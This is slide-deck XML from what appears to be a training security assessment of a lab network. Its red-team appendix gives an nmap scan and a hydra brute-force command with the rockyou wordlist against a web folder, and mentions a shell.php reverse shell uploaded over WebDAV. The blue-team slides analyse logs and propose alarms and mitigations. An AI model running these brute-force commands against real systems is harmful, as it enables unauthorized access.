                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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the search result shows the file was accessed 20 times.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1418" name="Google Shape;1418;p4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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Google Shape;1419;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451170" y="1420181"/>
            <a:ext cx="8509950" cy="3088960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117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20" name="Google Shape;1420;p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47019" y="1630411"/>
            <a:ext cx="7518252" cy="266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5" name="Google Shape;1425;p4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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Finding WebDAV Connection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US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 sz="14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log from May 6, 2021 indicates that the ‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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’ file was accessed using the username ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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ryan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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’.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1426" name="Google Shape;1426;p4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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1427" name="Google Shape;1427;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462766" y="1439480"/>
            <a:ext cx="8509950" cy="2728365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117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28" name="Google Shape;1428;p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50039" y="1636748"/>
            <a:ext cx="4915326" cy="23338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9" name="Google Shape;1449;p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450" name="Google Shape;1450;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="202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b="1"/>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1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-US" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="34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-US" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3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451" name="Google Shape;1451;p48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en-US"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24</a:t>
            </a:fld>
            <a:endParaRPr sz="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6" name="Google Shape;1456;p4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dirty="0"/>
              <a:t>Mitigation: Blocking IP Traffic</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1457" name="Google Shape;1457;p49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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1458" name="Google Shape;1458;p49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="30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1400" dirty="0"/>
              <a:t>Set an alarm to detect a port scan from a specific IP address (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 192.168.1.8) with a threshold of maybe 25 scans per minute or 150 ping requests per minute.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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400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400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400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400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400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400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Google Shape;1459;p49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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1400" dirty="0"/>
              <a:t>Disable ports that don't need to be accessed from outside the organization.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Install a firewall and an intrusion detection system.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Perform routine port scans on your network.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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400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400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400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" name="Google Shape;1464;p5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dirty="0"/>
              <a:t>Mitigation: Identifying Request for Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1465" name="Google Shape;1465;p5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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1466" name="Google Shape;1466;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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1400" dirty="0"/>
              <a:t>Set an alarm to detect unauthorized access to directories/files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>’) if an IP address is not on the access control list.  </a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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dirty="0"/>
              <a:t>Set an alarm if a specific directory/file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>”) is accessed other than a specific user such as the system administrator.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400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400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467" name="Google Shape;1467;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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1400" dirty="0"/>
              <a:t>Restrict access to specific files by using an access control list.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Disable the directory listing on the Apache web server.  </a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Encrypt sensitive files.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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400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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400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400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5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Mitigation: Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1473" name="Google Shape;1473;p51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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1474" name="Google Shape;1474;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="154009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1400" dirty="0"/>
              <a:t>Set an alarm to detect brute force attacks  if there is excessive warnings of unsuccessful login attempts with a threshold of maybe 50,000 attempts per second.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Set an alarm if a specific IP address (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 192.168.1.8) is attempting to login with a threshold of maybe again 50,000 attempts per second.  </a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1475" name="Google Shape;1475;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475414" y="1540090"/>
            <a:ext cx="4298400" cy="3341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1400" dirty="0"/>
              <a:t>Password policy enforced. </a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Enable multi-factor authentication.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Restrict the number of login attempts.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Enable CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), to determine whether a user's input is coming from a human or a machine/bot.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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0" name="Google Shape;1480;p5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dirty="0"/>
              <a:t>Mitigation: Detecting WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1481" name="Google Shape;1481;p52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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1482" name="Google Shape;1482;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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1400" dirty="0"/>
              <a:t>Set an alarm to detect connection to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> server if the connection is not a user or IP address on the access control list.</a:t>
            </a:r>
            <a:endParaRPr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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1483" name="Google Shape;1483;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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4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4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4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4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400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1484" name="Google Shape;1484;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857902" y="1534915"/>
            <a:ext cx="3996538" cy="34162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Restrict or allow specific IP addresses.</a:t>
            </a:r>
            <a:endParaRPr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Install an intrusion detection system or intrusion prevention system.</a:t>
            </a:r>
            <a:endParaRPr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Perform regular updates and patches.</a:t>
            </a:r>
            <a:endParaRPr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Remove unnecessary features of the operating system and accounts that are expired or not used.</a:t>
            </a:r>
            <a:endParaRPr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Disable services not used.</a:t>
            </a:r>
            <a:endParaRPr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9" name="Google Shape;1489;p5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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490" name="Google Shape;1490;p53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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1491" name="Google Shape;1491;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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1400" dirty="0"/>
              <a:t>Set an alarm to detect file uploads if an IP address is not on the access control list.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sz="1400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1400" dirty="0"/>
              <a:t>Set an alarm if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> directories that contain executable files are accessed other than a specific user such as the system administrator.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1492" name="Google Shape;1492;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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1400" dirty="0"/>
              <a:t>Restrict access to executable files by using an access control list.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1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400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1400" dirty="0"/>
              <a:t>Require authentication when files are uploaded.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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sz="1400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1400" dirty="0"/>
              <a:t>Restrict executable files from being accessed from the web.</a:t>
            </a:r>
            <a:endParaRPr sz="1400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 </a:t>
            </a:r>
            <a:endParaRPr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p3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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p3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en-US"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fld>
            <a:endParaRPr sz="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p3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dirty="0"/>
              <a:t>Appendix </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p3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en-US"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31</a:t>
            </a:fld>
            <a:endParaRPr sz="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915779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dirty="0"/>
              <a:t>Appendix A1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access Sensitive Information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;p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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1092" name="Google Shape;1092;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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3" name="Google Shape;1093;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717649" y="1487250"/>
            <a:ext cx="2371500" cy="31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b="1" i="0" u="none" strike="noStrike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sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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Tools used to gain access to the ‘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secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike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: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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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  nmap</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none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  -  Web browser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  -  hydra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 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   </a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none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b="0" i="0" u="none" strike="noStrike" cap="none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094" name="Google Shape;1094;p8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095" name="Google Shape;1095;p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lang="en-US" sz="21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096" name="Google Shape;1096;p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97" name="Google Shape;1097;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1098" name="Google Shape;1098;p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lang="en-US" sz="21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099" name="Google Shape;1099;p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00" name="Google Shape;1100;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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1" name="Google Shape;1101;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31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sz="1200" b="1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Able to access the ‘secret_folder’ directory to view the contents file, ‘connect_to_corp_server’, which gave instructions on how to connect to the victim’s machine.</a:t>
            </a:r>
            <a:endParaRPr sz="12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02" name="Google Shape;1102;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1103" name="Google Shape;1103;p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lang="en-US" sz="21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04" name="Google Shape;1104;p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05" name="Google Shape;1105;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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6" name="Google Shape;1106;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="32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  #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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike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192.168.1.8/24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  Navigate to 192.168.1.105/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company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike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/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secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none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# hydra –l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ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike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–P /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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike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/share/wordlists/rockyou.txt –s 80 –f -v 192.168.1.105 http-get /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company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike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/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secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none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Google Shape;1111;p1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dirty="0"/>
              <a:t>Appendix A2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access Sensitive Information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="0" i="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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Perform a port scan to retrieve host and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>service information:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.8/24</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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4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2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p1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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;1114;p10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E855594-9B19-4635-91A8-38E3CCCBFAD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82077" y="773867"/>
            <a:ext cx="3782440" cy="390261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067647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Google Shape;1143;p1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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Appendix B: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute Force 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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ttacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144" name="Google Shape;1144;p1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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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6" name="Google Shape;1146;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="31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sz="1200" b="1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Tools used to brute force account passwords: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  -  hydra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  -  Crack Station website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 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47" name="Google Shape;1147;p14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148" name="Google Shape;1148;p1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lang="en-US" sz="21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49" name="Google Shape;1149;p14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50" name="Google Shape;1150;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1151" name="Google Shape;1151;p1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lang="en-US" sz="21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52" name="Google Shape;1152;p14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53" name="Google Shape;1153;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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4" name="Google Shape;1154;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31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sz="1200" b="1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Able to gain access to the ‘secret_folder’ and to connect to the victim’s machine after cracking the passwords.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2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55" name="Google Shape;1155;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1156" name="Google Shape;1156;p1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lang="en-US" sz="21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57" name="Google Shape;1157;p14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58" name="Google Shape;1158;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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9" name="Google Shape;1159;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
